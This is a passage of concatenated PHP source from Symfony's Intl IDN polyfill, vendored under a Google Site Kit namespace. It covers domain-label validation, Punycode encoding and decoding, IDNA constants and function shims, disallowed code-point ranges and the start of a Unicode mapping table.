* @param array<int, string> $labels */ private static function validateDomainAndLabelLength(array $labels, \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Info $info) { $maxDomainSize = self::MAX_DOMAIN_SIZE; $length = \count($labels); // Number of "." delimiters. $domainLength = $length - 1; // If the last label is empty and it is not the first label, then it is the root label. // Increase the max size by 1, making it 254, to account for the root label's "." // delimiter. This also means we don't need to check the last label's length for being too // long. if ($length > 1 && '' === $labels[$length - 1]) { ++$maxDomainSize; --$length; } for ($i = 0; $i < $length; ++$i) { $bytes = \strlen($labels[$i]); $domainLength += $bytes; if ($bytes > self::MAX_LABEL_SIZE) { $info->errors |= self::ERROR_LABEL_TOO_LONG; } } if ($domainLength > $maxDomainSize) { $info->errors |= self::ERROR_DOMAIN_NAME_TOO_LONG; } } /** * @see https://www.unicode.org/reports/tr46/#Validity_Criteria * * @param string $label * @param array<string, bool> $options * @param bool $canBeEmpty */ private static function validateLabel($label, \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Info $info, array $options, $canBeEmpty) { if ('' === $label) { if (!$canBeEmpty && (!isset($options['VerifyDnsLength']) || $options['VerifyDnsLength'])) { $info->errors |= self::ERROR_EMPTY_LABEL; } return; } // Step 1. The label must be in Unicode Normalization Form C. if (!\Normalizer::isNormalized($label, \Normalizer::FORM_C)) { $info->errors |= self::ERROR_INVALID_ACE_LABEL; } $codePoints = self::utf8Decode($label); if ($options['CheckHyphens']) { // Step 2. If CheckHyphens, the label must not contain a U+002D HYPHEN-MINUS character // in both the thrid and fourth positions. if (isset($codePoints[2], $codePoints[3]) && 0x2d === $codePoints[2] && 0x2d === $codePoints[3]) { $info->errors |= self::ERROR_HYPHEN_3_4; } // Step 3. If CheckHyphens, the label must neither begin nor end with a U+002D // HYPHEN-MINUS character. if ('-' === \substr($label, 0, 1)) { $info->errors |= self::ERROR_LEADING_HYPHEN; } if ('-' === \substr($label, -1, 1)) { $info->errors |= self::ERROR_TRAILING_HYPHEN; } } elseif ('xn--' === \substr($label, 0, 4)) { $info->errors |= self::ERROR_PUNYCODE; } // Step 4. The label must not contain a U+002E (.) FULL STOP. if (\false !== \strpos($label, '.')) { $info->errors |= self::ERROR_LABEL_HAS_DOT; } // Step 5. The label must not begin with a combining mark, that is: General_Category=Mark. if (1 === \preg_match(\Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Resources\unidata\Regex::COMBINING_MARK, $label)) { $info->errors |= self::ERROR_LEADING_COMBINING_MARK; } // Step 6. Each code point in the label must only have certain status values according to // Section 5, IDNA Mapping Table: $transitional = $options['Transitional_Processing']; $useSTD3ASCIIRules = $options['UseSTD3ASCIIRules']; foreach ($codePoints as $codePoint) { $data = self::lookupCodePointStatus($codePoint, $useSTD3ASCIIRules); $status = $data['status']; if ('valid' === $status || !$transitional && 'deviation' === $status) { continue; } $info->errors |= self::ERROR_DISALLOWED; break; } // Step 7. If CheckJoiners, the label must satisify the ContextJ rules from Appendix A, in // The Unicode Code Points and Internationalized Domain Names for Applications (IDNA) // [IDNA2008]. if ($options['CheckJoiners'] && !self::isValidContextJ($codePoints, $label)) { $info->errors |= self::ERROR_CONTEXTJ; } // Step 8. If CheckBidi, and if the domain name is a Bidi domain name, then the label must // satisfy all six of the numbered conditions in [IDNA2008] RFC 5893, Section 2. if ($options['CheckBidi'] && (!$info->bidiDomain || $info->validBidiDomain)) { self::validateBidiLabel($label, $info); } } /** * @see https://tools.ietf.org/html/rfc3492#section-6.2 * * @param string $input * * @return string */ private static function punycodeDecode($input) { $n = self::INITIAL_N; $out = 0; $i = 0; $bias = self::INITIAL_BIAS; $lastDelimIndex = \strrpos($input, self::DELIMITER); $b = \false === $lastDelimIndex ? 0 : $lastDelimIndex; $inputLength = \strlen($input); $output = []; $bytes = \array_map('ord', \str_split($input)); for ($j = 0; $j < $b; ++$j) { if ($bytes[$j] > 0x7f) { throw new \Exception('Invalid input'); } $output[$out++] = $input[$j]; } if ($b > 0) { ++$b; } for ($in = $b; $in < $inputLength; ++$out) { $oldi = $i; $w = 1; for ($k = self::BASE;; $k += self::BASE) { if ($in >= $inputLength) { throw new \Exception('Invalid input'); } $digit = self::$basicToDigit[$bytes[$in++] & 0xff]; if ($digit < 0) { throw new \Exception('Invalid input'); } if ($digit > \intdiv(self::MAX_INT - $i, $w)) { throw new \Exception('Integer overflow'); } $i += $digit * $w; if ($k <= $bias) { $t = self::TMIN; } elseif ($k >= $bias + self::TMAX) { $t = self::TMAX; } else { $t = $k - $bias; } if ($digit < $t) { break; } $baseMinusT = self::BASE - $t; if ($w > \intdiv(self::MAX_INT, $baseMinusT)) { throw new \Exception('Integer overflow'); } $w *= $baseMinusT; } $outPlusOne = $out + 1; $bias = self::adaptBias($i - $oldi, $outPlusOne, 0 === $oldi); if (\intdiv($i, $outPlusOne) > self::MAX_INT - $n) { throw new \Exception('Integer overflow'); } $n += \intdiv($i, $outPlusOne); $i %= $outPlusOne; \array_splice($output, $i++, 0, [\mb_chr($n, 'utf-8')]); } return \implode('', $output); } /** * @see https://tools.ietf.org/html/rfc3492#section-6.3 * * @param string $input * * @return string */ private static function punycodeEncode($input) { $n = self::INITIAL_N; $delta = 0; $out = 0; $bias = self::INITIAL_BIAS; $inputLength = 0; $output = ''; $iter = self::utf8Decode($input); foreach ($iter as $codePoint) { ++$inputLength; if ($codePoint < 0x80) { $output .= \chr($codePoint); ++$out; } } $h = $out; $b = $out; if ($b > 0) { $output .= self::DELIMITER; ++$out; } while ($h < $inputLength) { $m = self::MAX_INT; foreach ($iter as $codePoint) { if ($codePoint >= $n && $codePoint < $m) { $m = $codePoint; } } if ($m - $n > \intdiv(self::MAX_INT - $delta, $h + 1)) { throw new \Exception('Integer overflow'); } $delta += ($m - $n) * ($h + 1); $n = $m; foreach ($iter as $codePoint) { if ($codePoint < $n && 0 === ++$delta) { throw new \Exception('Integer overflow'); } if ($codePoint === $n) { $q = $delta; for ($k = self::BASE;; $k += self::BASE) { if ($k <= $bias) { $t = self::TMIN; } elseif ($k >= $bias + self::TMAX) { $t = self::TMAX; } else { $t = $k - $bias; } if ($q < $t) { break; } $qMinusT = $q - $t; $baseMinusT = self::BASE - $t; $output .= self::encodeDigit($t + $qMinusT % $baseMinusT, \false); ++$out; $q = \intdiv($qMinusT, $baseMinusT); } $output .= self::encodeDigit($q, \false); ++$out; $bias = self::adaptBias($delta, $h + 1, $h === $b); $delta = 0; ++$h; } } ++$delta; ++$n; } return $output; } /** * @see https://tools.ietf.org/html/rfc3492#section-6.1 * * @param int $delta * @param int $numPoints * @param bool $firstTime * * @return int */ private static function adaptBias($delta, $numPoints, $firstTime) { // xxx >> 1 is a faster way of doing intdiv(xxx, 2) $delta = $firstTime ? \intdiv($delta, self::DAMP) : $delta >> 1; $delta += \intdiv($delta, $numPoints); $k = 0; while ($delta > (self::BASE - self::TMIN) * self::TMAX >> 1) { $delta = \intdiv($delta, self::BASE - self::TMIN); $k += self::BASE; } return $k + \intdiv((self::BASE - self::TMIN + 1) * $delta, $delta + self::SKEW); } /** * @param int $d * @param bool $flag * * @return string */ private static function encodeDigit($d, $flag) { return \chr($d + 22 + 75 * ($d < 26 ? 1 : 0) - (($flag ? 1 : 0) << 5)); } /** * Takes a UTF-8 encoded string and converts it into a series of integer code points. Any * invalid byte sequences will be replaced by a U+FFFD replacement code point. * * @see https://encoding.spec.whatwg.org/#utf-8-decoder * * @param string $input * * @return array<int, int> */ private static function utf8Decode($input) { $bytesSeen = 0; $bytesNeeded = 0; $lowerBoundary = 0x80; $upperBoundary = 0xbf; $codePoint = 0; $codePoints = []; $length = \strlen($input); for ($i = 0; $i < $length; ++$i) { $byte = \ord($input[$i]); if (0 === $bytesNeeded) { if ($byte >= 0x0 && $byte <= 0x7f) { $codePoints[] = $byte; continue; } if ($byte >= 0xc2 && $byte <= 0xdf) { $bytesNeeded = 1; $codePoint = $byte & 0x1f; } elseif ($byte >= 0xe0 && $byte <= 0xef) { if (0xe0 === $byte) { $lowerBoundary = 0xa0; } elseif (0xed === $byte) { $upperBoundary = 0x9f; } $bytesNeeded = 2; $codePoint = $byte & 0xf; } elseif ($byte >= 0xf0 && $byte <= 0xf4) { if (0xf0 === $byte) { $lowerBoundary = 0x90; } elseif (0xf4 === $byte) { $upperBoundary = 0x8f; } $bytesNeeded = 3; $codePoint = $byte & 0x7; } else { $codePoints[] = 0xfffd; } continue; } if ($byte < $lowerBoundary || $byte > $upperBoundary) { $codePoint = 0; $bytesNeeded = 0; $bytesSeen = 0; $lowerBoundary = 0x80; $upperBoundary = 0xbf; --$i; $codePoints[] = 0xfffd; continue; } $lowerBoundary = 0x80; $upperBoundary = 0xbf; $codePoint = $codePoint << 6 | $byte & 0x3f; if (++$bytesSeen !== $bytesNeeded) { continue; } $codePoints[] = $codePoint; $codePoint = 0; $bytesNeeded = 0; $bytesSeen = 0; } // String unexpectedly ended, so append a U+FFFD code point. if (0 !== $bytesNeeded) { $codePoints[] = 0xfffd; } return $codePoints; } /** * @param int $codePoint * @param bool $useSTD3ASCIIRules * * @return array{status: string, mapping?: string} */ private static function lookupCodePointStatus($codePoint, $useSTD3ASCIIRules) { if (!self::$mappingTableLoaded) { self::$mappingTableLoaded = \true; self::$mapped = (require __DIR__ . '/Resources/unidata/mapped.php'); self::$ignored = (require __DIR__ . '/Resources/unidata/ignored.php'); self::$deviation = (require __DIR__ . '/Resources/unidata/deviation.php'); self::$disallowed = (require __DIR__ . '/Resources/unidata/disallowed.php'); self::$disallowed_STD3_mapped = (require __DIR__ . '/Resources/unidata/disallowed_STD3_mapped.php'); self::$disallowed_STD3_valid = (require __DIR__ . '/Resources/unidata/disallowed_STD3_valid.php'); } if (isset(self::$mapped[$codePoint])) { return ['status' => 'mapped', 'mapping' => self::$mapped[$codePoint]]; } if (isset(self::$ignored[$codePoint])) { return ['status' => 'ignored']; } if (isset(self::$deviation[$codePoint])) { return ['status' => 'deviation', 'mapping' => self::$deviation[$codePoint]]; } if (isset(self::$disallowed[$codePoint]) || \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Resources\unidata\DisallowedRanges::inRange($codePoint)) { return ['status' => 'disallowed']; } $isDisallowedMapped = isset(self::$disallowed_STD3_mapped[$codePoint]); if ($isDisallowedMapped || isset(self::$disallowed_STD3_valid[$codePoint])) { $status = 'disallowed'; if (!$useSTD3ASCIIRules) { $status = $isDisallowedMapped ? 'mapped' : 'valid'; } if ($isDisallowedMapped) { return ['status' => $status, 'mapping' => self::$disallowed_STD3_mapped[$codePoint]]; } return ['status' => $status]; } return ['status' => 'valid']; } } <?php /* namespace Google\Site_Kit_Dependencies intentionally removed */ /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ use Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn as p; if (\extension_loaded('intl')) { return; } if (\PHP_VERSION_ID >= 80000) { return require __DIR__ . '/bootstrap80.php'; } if (!\defined('U_IDNA_PROHIBITED_ERROR')) { \define('U_IDNA_PROHIBITED_ERROR', 66560); } if (!\defined('U_IDNA_ERROR_START')) { \define('U_IDNA_ERROR_START', 66560); } if (!\defined('U_IDNA_UNASSIGNED_ERROR')) { \define('U_IDNA_UNASSIGNED_ERROR', 66561); } if (!\defined('U_IDNA_CHECK_BIDI_ERROR')) { \define('U_IDNA_CHECK_BIDI_ERROR', 66562); } if (!\defined('U_IDNA_STD3_ASCII_RULES_ERROR')) { \define('U_IDNA_STD3_ASCII_RULES_ERROR', 66563); } if (!\defined('U_IDNA_ACE_PREFIX_ERROR')) { \define('U_IDNA_ACE_PREFIX_ERROR', 66564); } if (!\defined('U_IDNA_VERIFICATION_ERROR')) { \define('U_IDNA_VERIFICATION_ERROR', 66565); } if (!\defined('U_IDNA_LABEL_TOO_LONG_ERROR')) { \define('U_IDNA_LABEL_TOO_LONG_ERROR', 66566); } if (!\defined('U_IDNA_ZERO_LENGTH_LABEL_ERROR')) { \define('U_IDNA_ZERO_LENGTH_LABEL_ERROR', 66567); } if (!\defined('U_IDNA_DOMAIN_NAME_TOO_LONG_ERROR')) { \define('U_IDNA_DOMAIN_NAME_TOO_LONG_ERROR', 66568); } if (!\defined('U_IDNA_ERROR_LIMIT')) { \define('U_IDNA_ERROR_LIMIT', 66569); } if (!\defined('U_STRINGPREP_PROHIBITED_ERROR')) { \define('U_STRINGPREP_PROHIBITED_ERROR', 66560); } if (!\defined('U_STRINGPREP_UNASSIGNED_ERROR')) { \define('U_STRINGPREP_UNASSIGNED_ERROR', 66561); } if (!\defined('U_STRINGPREP_CHECK_BIDI_ERROR')) { \define('U_STRINGPREP_CHECK_BIDI_ERROR', 66562); } if (!\defined('IDNA_DEFAULT')) { \define('IDNA_DEFAULT', 0); } if (!\defined('IDNA_ALLOW_UNASSIGNED')) { \define('IDNA_ALLOW_UNASSIGNED', 1); } if (!\defined('IDNA_USE_STD3_RULES')) { \define('IDNA_USE_STD3_RULES', 2); } if (!\defined('IDNA_CHECK_BIDI')) { \define('IDNA_CHECK_BIDI', 4); } if (!\defined('IDNA_CHECK_CONTEXTJ')) { \define('IDNA_CHECK_CONTEXTJ', 8); } if (!\defined('IDNA_NONTRANSITIONAL_TO_ASCII')) { \define('IDNA_NONTRANSITIONAL_TO_ASCII', 16); } if (!\defined('IDNA_NONTRANSITIONAL_TO_UNICODE')) { \define('IDNA_NONTRANSITIONAL_TO_UNICODE', 32); } if (!\defined('INTL_IDNA_VARIANT_2003')) { \define('INTL_IDNA_VARIANT_2003', 0); } if (!\defined('INTL_IDNA_VARIANT_UTS46')) { \define('INTL_IDNA_VARIANT_UTS46', 1); } if (!\defined('IDNA_ERROR_EMPTY_LABEL')) { \define('IDNA_ERROR_EMPTY_LABEL', 1); } if (!\defined('IDNA_ERROR_LABEL_TOO_LONG')) { \define('IDNA_ERROR_LABEL_TOO_LONG', 2); } if (!\defined('IDNA_ERROR_DOMAIN_NAME_TOO_LONG')) { \define('IDNA_ERROR_DOMAIN_NAME_TOO_LONG', 4); } if (!\defined('IDNA_ERROR_LEADING_HYPHEN')) { \define('IDNA_ERROR_LEADING_HYPHEN', 8); } if (!\defined('IDNA_ERROR_TRAILING_HYPHEN')) { \define('IDNA_ERROR_TRAILING_HYPHEN', 16); } if (!\defined('IDNA_ERROR_HYPHEN_3_4')) { \define('IDNA_ERROR_HYPHEN_3_4', 32); } if (!\defined('IDNA_ERROR_LEADING_COMBINING_MARK')) { \define('IDNA_ERROR_LEADING_COMBINING_MARK', 64); } if (!\defined('IDNA_ERROR_DISALLOWED')) { \define('IDNA_ERROR_DISALLOWED', 128); } if (!\defined('IDNA_ERROR_PUNYCODE')) { \define('IDNA_ERROR_PUNYCODE', 256); } if (!\defined('IDNA_ERROR_LABEL_HAS_DOT')) { \define('IDNA_ERROR_LABEL_HAS_DOT', 512); } if (!\defined('IDNA_ERROR_INVALID_ACE_LABEL')) { \define('IDNA_ERROR_INVALID_ACE_LABEL', 1024); } if (!\defined('IDNA_ERROR_BIDI')) { \define('IDNA_ERROR_BIDI', 2048); } if (!\defined('IDNA_ERROR_CONTEXTJ')) { \define('IDNA_ERROR_CONTEXTJ', 4096); } if (\PHP_VERSION_ID < 70400) { if (!\function_exists('idn_to_ascii')) { function idn_to_ascii($domain, $flags = 0, $variant = \INTL_IDNA_VARIANT_2003, &$idna_info = null) { return \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Idn::idn_to_ascii($domain, $flags, $variant, $idna_info); } } if (!\function_exists('idn_to_utf8')) { function idn_to_utf8($domain, $flags = 0, $variant = \INTL_IDNA_VARIANT_2003, &$idna_info = null) { return \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Idn::idn_to_utf8($domain, $flags, $variant, $idna_info); } } } else { if (!\function_exists('idn_to_ascii')) { function idn_to_ascii($domain, $flags = 0, $variant = \INTL_IDNA_VARIANT_UTS46, &$idna_info = null) { return \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Idn::idn_to_ascii($domain, $flags, $variant, $idna_info); } } if (!\function_exists('idn_to_utf8')) { function idn_to_utf8($domain, $flags = 0, $variant = \INTL_IDNA_VARIANT_UTS46, &$idna_info = null) { return \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Idn::idn_to_utf8($domain, $flags, $variant, $idna_info); } } } <?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> and Trevor Rowbotham <trevor.rowbotham@pm.me> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn; /** * @internal */ class Info { public $bidiDomain = \false; public $errors = 0; public $validBidiDomain = \true; public $transitionalDifferent = \false; } <?php namespace Google\Site_Kit_Dependencies; /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ use Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn as p; if (!\defined('U_IDNA_PROHIBITED_ERROR')) { \define('U_IDNA_PROHIBITED_ERROR', 66560); } if (!\defined('U_IDNA_ERROR_START')) { \define('U_IDNA_ERROR_START', 66560); } if (!\defined('U_IDNA_UNASSIGNED_ERROR')) { \define('U_IDNA_UNASSIGNED_ERROR', 66561); } if (!\defined('U_IDNA_CHECK_BIDI_ERROR')) { \define('U_IDNA_CHECK_BIDI_ERROR', 66562); } if (!\defined('U_IDNA_STD3_ASCII_RULES_ERROR')) { \define('U_IDNA_STD3_ASCII_RULES_ERROR', 66563); } if (!\defined('U_IDNA_ACE_PREFIX_ERROR')) { \define('U_IDNA_ACE_PREFIX_ERROR', 66564); } if (!\defined('U_IDNA_VERIFICATION_ERROR')) { \define('U_IDNA_VERIFICATION_ERROR', 66565); } if (!\defined('U_IDNA_LABEL_TOO_LONG_ERROR')) { \define('U_IDNA_LABEL_TOO_LONG_ERROR', 66566); } if (!\defined('U_IDNA_ZERO_LENGTH_LABEL_ERROR')) { \define('U_IDNA_ZERO_LENGTH_LABEL_ERROR', 66567); } if (!\defined('U_IDNA_DOMAIN_NAME_TOO_LONG_ERROR')) { \define('U_IDNA_DOMAIN_NAME_TOO_LONG_ERROR', 66568); } if (!\defined('U_IDNA_ERROR_LIMIT')) { \define('U_IDNA_ERROR_LIMIT', 66569); } if (!\defined('U_STRINGPREP_PROHIBITED_ERROR')) { \define('U_STRINGPREP_PROHIBITED_ERROR', 66560); } if (!\defined('U_STRINGPREP_UNASSIGNED_ERROR')) { \define('U_STRINGPREP_UNASSIGNED_ERROR', 66561); } if (!\defined('U_STRINGPREP_CHECK_BIDI_ERROR')) { \define('U_STRINGPREP_CHECK_BIDI_ERROR', 66562); } if (!\defined('IDNA_DEFAULT')) { \define('IDNA_DEFAULT', 0); } if (!\defined('IDNA_ALLOW_UNASSIGNED')) { \define('IDNA_ALLOW_UNASSIGNED', 1); } if (!\defined('IDNA_USE_STD3_RULES')) { \define('IDNA_USE_STD3_RULES', 2); } if (!\defined('IDNA_CHECK_BIDI')) { \define('IDNA_CHECK_BIDI', 4); } if (!\defined('IDNA_CHECK_CONTEXTJ')) { \define('IDNA_CHECK_CONTEXTJ', 8); } if (!\defined('IDNA_NONTRANSITIONAL_TO_ASCII')) { \define('IDNA_NONTRANSITIONAL_TO_ASCII', 16); } if (!\defined('IDNA_NONTRANSITIONAL_TO_UNICODE')) { \define('IDNA_NONTRANSITIONAL_TO_UNICODE', 32); } if (!\defined('INTL_IDNA_VARIANT_UTS46')) { \define('INTL_IDNA_VARIANT_UTS46', 1); } if (!\defined('IDNA_ERROR_EMPTY_LABEL')) { \define('IDNA_ERROR_EMPTY_LABEL', 1); } if (!\defined('IDNA_ERROR_LABEL_TOO_LONG')) { \define('IDNA_ERROR_LABEL_TOO_LONG', 2); } if (!\defined('IDNA_ERROR_DOMAIN_NAME_TOO_LONG')) { \define('IDNA_ERROR_DOMAIN_NAME_TOO_LONG', 4); } if (!\defined('IDNA_ERROR_LEADING_HYPHEN')) { \define('IDNA_ERROR_LEADING_HYPHEN', 8); } if (!\defined('IDNA_ERROR_TRAILING_HYPHEN')) { \define('IDNA_ERROR_TRAILING_HYPHEN', 16); } if (!\defined('IDNA_ERROR_HYPHEN_3_4')) { \define('IDNA_ERROR_HYPHEN_3_4', 32); } if (!\defined('IDNA_ERROR_LEADING_COMBINING_MARK')) { \define('IDNA_ERROR_LEADING_COMBINING_MARK', 64); } if (!\defined('IDNA_ERROR_DISALLOWED')) { \define('IDNA_ERROR_DISALLOWED', 128); } if (!\defined('IDNA_ERROR_PUNYCODE')) { \define('IDNA_ERROR_PUNYCODE', 256); } if (!\defined('IDNA_ERROR_LABEL_HAS_DOT')) { \define('IDNA_ERROR_LABEL_HAS_DOT', 512); } if (!\defined('IDNA_ERROR_INVALID_ACE_LABEL')) { \define('IDNA_ERROR_INVALID_ACE_LABEL', 1024); } if (!\defined('IDNA_ERROR_BIDI')) { \define('IDNA_ERROR_BIDI', 2048); } if (!\defined('IDNA_ERROR_CONTEXTJ')) { \define('IDNA_ERROR_CONTEXTJ', 4096); } if (!\function_exists('idn_to_ascii')) { function idn_to_ascii(?string $domain, ?int $flags = \IDNA_DEFAULT, ?int $variant = \INTL_IDNA_VARIANT_UTS46, &$idna_info = null) : string|false { return \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Idn::idn_to_ascii((string) $domain, (int) $flags, (int) $variant, $idna_info); } } if (!\function_exists('idn_to_utf8')) { function idn_to_utf8(?string $domain, ?int $flags = \IDNA_DEFAULT, ?int $variant = \INTL_IDNA_VARIANT_UTS46, &$idna_info = null) : string|false { return \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Idn::idn_to_utf8((string) $domain, (int) $flags, (int) $variant, $idna_info); } } <?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Resources\unidata; /** * @internal */ final class DisallowedRanges { /** * @param int $codePoint * * @return bool */ public static function inRange($codePoint) { if ($codePoint >= 128 && $codePoint <= 159) { return \true; } if ($codePoint >= 2155 && $codePoint <= 2207) { return \true; } if ($codePoint >= 3676 && $codePoint <= 3712) { return \true; } if ($codePoint >= 3808 && $codePoint <= 3839) { return \true; } if ($codePoint >= 4059 && $codePoint <= 4095) { return \true; } if ($codePoint >= 4256 && $codePoint <= 4293) { return \true; } if ($codePoint >= 6849 && $codePoint <= 6911) { return \true; } if ($codePoint >= 11859 && $codePoint <= 11903) { return \true; } if ($codePoint >= 42955 && $codePoint <= 42996) { return \true; } if ($codePoint >= 55296 && $codePoint <= 57343) { return \true; } if ($codePoint >= 57344 && $codePoint <= 63743) { return \true; } if ($codePoint >= 64218 && $codePoint <= 64255) { return \true; } if ($codePoint >= 64976 && $codePoint <= 65007) { return \true; } if ($codePoint >= 65630 && $codePoint <= 65663) { return \true; } if ($codePoint >= 65953 && $codePoint <= 65999) { return \true; } if ($codePoint >= 66046 && $codePoint <= 66175) { return \true; } if ($codePoint >= 66518 && $codePoint <= 66559) { return \true; } if ($codePoint >= 66928 && $codePoint <= 67071) { return \true; } if ($codePoint >= 67432 && $codePoint <= 67583) { return \true; } if ($codePoint >= 67760 && $codePoint <= 67807) { return \true; } if ($codePoint >= 67904 && $codePoint <= 67967) { return \true; } if ($codePoint >= 68256 && $codePoint <= 68287) { return \true; } if ($codePoint >= 68528 && $codePoint <= 68607) { return \true; } if ($codePoint >= 68681 && $codePoint <= 68735) { return \true; } if ($codePoint >= 68922 && $codePoint <= 69215) { return \true; } if ($codePoint >= 69298 && $codePoint <= 69375) { return \true; } if ($codePoint >= 69466 && $codePoint <= 69551) { return \true; } if ($codePoint >= 70207 && $codePoint <= 70271) { return \true; } if ($codePoint >= 70517 && $codePoint <= 70655) { return \true; } if ($codePoint >= 70874 && $codePoint <= 71039) { return \true; } if ($codePoint >= 71134 && $codePoint <= 71167) { return \true; } if ($codePoint >= 71370 && $codePoint <= 71423) { return \true; } if ($codePoint >= 71488 && $codePoint <= 71679) { return \true; } if ($codePoint >= 71740 && $codePoint <= 71839) { return \true; } if ($codePoint >= 72026 && $codePoint <= 72095) { return \true; } if ($codePoint >= 72441 && $codePoint <= 72703) { return \true; } if ($codePoint >= 72887 && $codePoint <= 72959) { return \true; } if ($codePoint >= 73130 && $codePoint <= 73439) { return \true; } if ($codePoint >= 73465 && $codePoint <= 73647) { return \true; } if ($codePoint >= 74650 && $codePoint <= 74751) { return \true; } if ($codePoint >= 75076 && $codePoint <= 77823) { return \true; } if ($codePoint >= 78905 && $codePoint <= 82943) { return \true; } if ($codePoint >= 83527 && $codePoint <= 92159) { return \true; } if ($codePoint >= 92784 && $codePoint <= 92879) { return \true; } if ($codePoint >= 93072 && $codePoint <= 93759) { return \true; } if ($codePoint >= 93851 && $codePoint <= 93951) { return \true; } if ($codePoint >= 94112 && $codePoint <= 94175) { return \true; } if ($codePoint >= 101590 && $codePoint <= 101631) { return \true; } if ($codePoint >= 101641 && $codePoint <= 110591) { return \true; } if ($codePoint >= 110879 && $codePoint <= 110927) { return \true; } if ($codePoint >= 111356 && $codePoint <= 113663) { return \true; } if ($codePoint >= 113828 && $codePoint <= 118783) { return \true; } if ($codePoint >= 119366 && $codePoint <= 119519) { return \true; } if ($codePoint >= 119673 && $codePoint <= 119807) { return \true; } if ($codePoint >= 121520 && $codePoint <= 122879) { return \true; } if ($codePoint >= 122923 && $codePoint <= 123135) { return \true; } if ($codePoint >= 123216 && $codePoint <= 123583) { return \true; } if ($codePoint >= 123648 && $codePoint <= 124927) { return \true; } if ($codePoint >= 125143 && $codePoint <= 125183) { return \true; } if ($codePoint >= 125280 && $codePoint <= 126064) { return \true; } if ($codePoint >= 126133 && $codePoint <= 126208) { return \true; } if ($codePoint >= 126270 && $codePoint <= 126463) { return \true; } if ($codePoint >= 126652 && $codePoint <= 126703) { return \true; } if ($codePoint >= 126706 && $codePoint <= 126975) { return \true; } if ($codePoint >= 127406 && $codePoint <= 127461) { return \true; } if ($codePoint >= 127590 && $codePoint <= 127743) { return \true; } if ($codePoint >= 129202 && $codePoint <= 129279) { return \true; } if ($codePoint >= 129751 && $codePoint <= 129791) { return \true; } if ($codePoint >= 129995 && $codePoint <= 130031) { return \true; } if ($codePoint >= 130042 && $codePoint <= 131069) { return \true; } if ($codePoint >= 173790 && $codePoint <= 173823) { return \true; } if ($codePoint >= 191457 && $codePoint <= 194559) { return \true; } if ($codePoint >= 195102 && $codePoint <= 196605) { return \true; } if ($codePoint >= 201547 && $codePoint <= 262141) { return \true; } if ($codePoint >= 262144 && $codePoint <= 327677) { return \true; } if ($codePoint >= 327680 && $codePoint <= 393213) { return \true; } if ($codePoint >= 393216 && $codePoint <= 458749) { return \true; } if ($codePoint >= 458752 && $codePoint <= 524285) { return \true; } if ($codePoint >= 524288 && $codePoint <= 589821) { return \true; } if ($codePoint >= 589824 && $codePoint <= 655357) { return \true; } if ($codePoint >= 655360 && $codePoint <= 720893) { return \true; } if ($codePoint >= 720896 && $codePoint <= 786429) { return \true; } if ($codePoint >= 786432 && $codePoint <= 851965) { return \true; } if ($codePoint >= 851968 && $codePoint <= 917501) { return \true; } if ($codePoint >= 917536 && $codePoint <= 917631) { return \true; } if ($codePoint >= 917632 && $codePoint <= 917759) { return \true; } if ($codePoint >= 918000 && $codePoint <= 983037) { return \true; } if ($codePoint >= 983040 && $codePoint <= 1048573) { return \true; } if ($codePoint >= 1048576 && $codePoint <= 1114109) { return \true; } return \false; } } <?php namespace Google\Site_Kit_Dependencies; return array(65 => 'a', 66 => 'b', 67 => 'c', 68 => 'd', 69 => 'e', 70 => 'f', 71 => 'g', 72 => 'h', 73 => 'i', 74 => 'j', 75 => 'k', 76 => 'l', 77 => 'm', 78 => 'n', 79 => 'o', 80 => 'p', 81 => 'q', 82 => 'r', 83 => 's', 84 => 't', 85 => 'u', 86 => 'v', 87 => 'w', 88 => 'x', 89 => 'y', 90 => 'z', 170 => 'a', 178 => '2', 179 => '3', 181 => 'μ', 185 => '1', 186 => 'o', 188 => '1⁄4', 189 => '1⁄2', 190 => '3⁄4', 192 => 'à', 193 => 'á', 194 => 'â', 195 => 'ã', 196 => 'ä', 197 => 'å', 198 => 'æ', 199 => 'ç', 200 => 'è', 201 => 'é', 202 => 'ê', 203 => 'ë', 204 => 'ì', 205 => 'í', 206 => 'î', 207 => 'ï', 208 => 'ð', 209 => 'ñ', 210 => 'ò', 211 => 'ó', 212 => 'ô', 213 => 'õ', 214 => 'ö', 216 => 'ø', 217 => 'ù', 218 => 'ú', 219 => 'û', 220 => 'ü', 221 => 'ý', 222 => 'þ', 256 => 'ā', 258 => 'ă', 260 => 'ą', 262 => 'ć', 264 => 'ĉ', 266 => 'ċ', 268 => 'č', 270 => 'ď', 272 => 'đ', 274 => 'ē', 276 => 'ĕ', 278 => 'ė', 280 => 'ę', 282 => 'ě', 284 => 'ĝ', 286 => 'ğ', 288 => 'ġ', 290 => 'ģ', 292 => 'ĥ', 294 => 'ħ', 296 => 'ĩ', 298 => 'ī', 300 => 'ĭ', 302 => 'į', 304 => 'i̇', 306 => 'ij', 307 => 'ij', 308 => 'ĵ', 310 => 'ķ', 313 => 'ĺ', 315 => 'ļ', 317 => 'ľ', 319 => 'l·', 320 => 'l·', 321 => 'ł', 323 => 'ń', 325 => 'ņ', 327 => 'ň', 329 => 'ʼn', 330 => 'ŋ', 332 => 'ō', 334 => 'ŏ', 336 => 'ő', 338 => 'œ', 340 => 